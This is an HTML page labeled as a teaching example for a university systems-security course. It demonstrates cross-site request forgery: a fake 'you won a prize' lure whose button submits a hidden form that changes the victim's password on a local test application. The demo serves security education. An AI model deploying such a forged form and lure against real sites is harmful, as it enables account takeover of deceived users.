<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8" />
    <title>VOCÊ GANHOU UM PRÊMIO</title>
    <link rel="stylesheet" href="../public/css/style.css">
    <link rel="stylesheet" href="/css/style.css">
</head>
<body>
    
    <p class="aviso">ESTE É UM SITE DE EXEMPLO PARA A DISCIPLINA DE SEGURANÇA DE SISTEMAS NO CURSO DE BCC NO IFSP CAMPUS SALTO</p>
    
    <div>
        <h1>VOCÊ GANHOU UM PRÊMIO!</h1>
        <img src="/images/unnamed.png" alt="Gift" width="200" height="200">
        <p>Parabéns, você ganhou um prêmio! <br> <br>
        Você foi selecionado para receber um prêmio incrível! <br> <br>
        Para reivindicar seu prêmio, clique no botão abaixo.</p>

    </div>
    <form action="http://localhost:3000/change-password" method="POST">
        <input type="hidden" name="oldPassword" value="qualquerCoisa">
        <input type="hidden" name="newPassword" value="senhaH4ck3ada">
        <input type="hidden" name="confirmPassword" value="senhaH4ck3ada">
        <input type="submit" value="Clique aqui para ganhar um prêmio!">
    </form>

    <p class="aviso">ESTE É UM SITE DE EXEMPLO PARA A DISCIPLINA DE SEGURANÇA DE SISTEMAS NO CURSO DE BCC NO IFSP CAMPUS SALTO</p>

</body>
</html>